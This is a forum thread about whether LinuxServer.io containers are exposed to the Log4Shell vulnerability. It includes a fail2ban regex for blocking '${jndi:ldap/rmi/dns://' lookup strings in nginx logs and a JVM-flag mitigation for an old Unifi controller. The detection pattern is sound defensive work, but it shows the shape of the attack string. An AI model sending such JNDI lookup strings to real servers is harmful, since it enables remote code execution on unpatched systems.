Hi,
does anyone know if Linuxserver.io Containers use log4j and might be affected by the circulating exploits?
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228
I’m currently using SWAG and Nextcloud with NGINX, but I’ve disabled outside network access while clarifying this issue.
Thanks for any info!
Best regards
The containers that use Java may be affected by this exploit. The only one to our knowledge is Unifi and we released a patch for that image last night.
Ok, thanks for the info.
For anyone interested: I did some research, had a look at the nginx access log and came upon some calls. This was also helpful.
I created the following jail for fail2ban to directly block these calls:
[Definition]
failregex = ^<HOST> -.*"(GET|POST|HEAD).*HTTP.*"\$\{jndi:(ldap[s]?|rmi|dns)://?.*"$
            ^.*\$\{jndi:(ldap[s]?|rmi|dns)://?<ADDR>\:.*$
ignoreregex =
Might be useful for anyone using SWAG with Fail2Ban or just plain Fail2Ban
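What the two failregex lines above match can be checked offline before relying on them. The following is an added example, not code from the thread or from Fail2Ban: it copies both expressions unchanged, replaces Fail2Ban's <HOST> and <ADDR> tags with a simplified IPv4-only group (an assumption), and runs them over constructed nginx access-log lines.

```python
import re

# Simplified stand-in for fail2ban's <HOST>/<ADDR> tags: IPv4 only (assumption;
# the real tags also cover IPv6 and, for <HOST>, DNS names).
IP = r"(?P<host>\d{1,3}(?:\.\d{1,3}){3})"

# The two failregex lines from the post, copied unchanged.
FAILREGEX = [
    r'^<HOST> -.*"(GET|POST|HEAD).*HTTP.*"\$\{jndi:(ldap[s]?|rmi|dns)://?.*"$',
    r'^.*\$\{jndi:(ldap[s]?|rmi|dns)://?<ADDR>\:.*$',
]
COMPILED = [re.compile(r.replace("<HOST>", IP).replace("<ADDR>", IP))
            for r in FAILREGEX]

# Constructed nginx "combined" log lines (documentation address ranges only).
SAMPLE_LOG = [
    # 0: ordinary request
    '203.0.113.5 - - [11/Dec/2021:09:00:01 +0000] "GET /index.php HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0"',
    # 1: lookup string as the User-Agent field
    '198.51.100.7 - - [11/Dec/2021:09:00:02 +0000] "GET / HTTP/1.1" '
    '200 612 "-" "${jndi:ldap://192.0.2.10:1389/a}"',
    # 2: lookup string as the Referer field, host name instead of an IP
    '198.51.100.8 - - [11/Dec/2021:09:00:03 +0000] "GET / HTTP/1.1" '
    '200 612 "${jndi:ldap://callback.example/a}" "Mozilla/5.0"',
    # 3: lookup string inside the request path
    '198.51.100.9 - - [11/Dec/2021:09:00:04 +0000] '
    '"GET /?q=${jndi:dns://192.0.2.10:53/a} HTTP/1.1" 404 153 "-" "curl/7.68.0"',
]

def scan(lines):
    """Return (line_no, regex_no, captured_address) for every failregex hit."""
    hits = []
    for line_no, line in enumerate(lines):
        for regex_no, rx in enumerate(COMPILED):
            m = rx.search(line)
            if m:
                # The captured group is the address fail2ban would act on.
                hits.append((line_no, regex_no, m.group("host")))
    return hits

if __name__ == "__main__":
    for line_no, regex_no, addr in scan(SAMPLE_LOG):
        print(f"line {line_no}: failregex #{regex_no} captured {addr}")
```

In this sample the first expression captures the client address when the string opens the Referer or User-Agent field, while the second captures the address written inside the lookup string. `fail2ban-regex` performs the same kind of check with the real filter file and a real log.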
Is there any possibility to mitigate this attack on unifi-controller 6.0.45?
This is the last controller version that supports the APs I am running because Ubiquiti decided these are EOL and not supported any more in the newer controller versions.
It should be possible to modify the image and pass -Dlog4j2.formatMsgNoLookups=true as a parameter to the JVM?
Wow. That was extremely easy. I just created a shell script in /config/custom-cont-init.d/ which modifies the line using sed.
sed -i 's/-Xmx"${MEM_LIMIT}" -jar \/usr\/lib\/unifi\/lib\/ace.jar/-Xmx"${MEM_LIMIT}" -Dlog4j2.formatMsgNoLookups=true -jar \/usr\/lib\/unifi\/lib\/ace.jar/' /etc/services.d/unifi/run
Thank you.
All relevant info is here: log4j Vulnerability | Info :: LinuxServer.io
No plans at this point to add modsecurity to the swag container. (Not that I think we can because I can’t seem to find an alpine package for it)
Ubooquity’s developer states that it does not use log4j.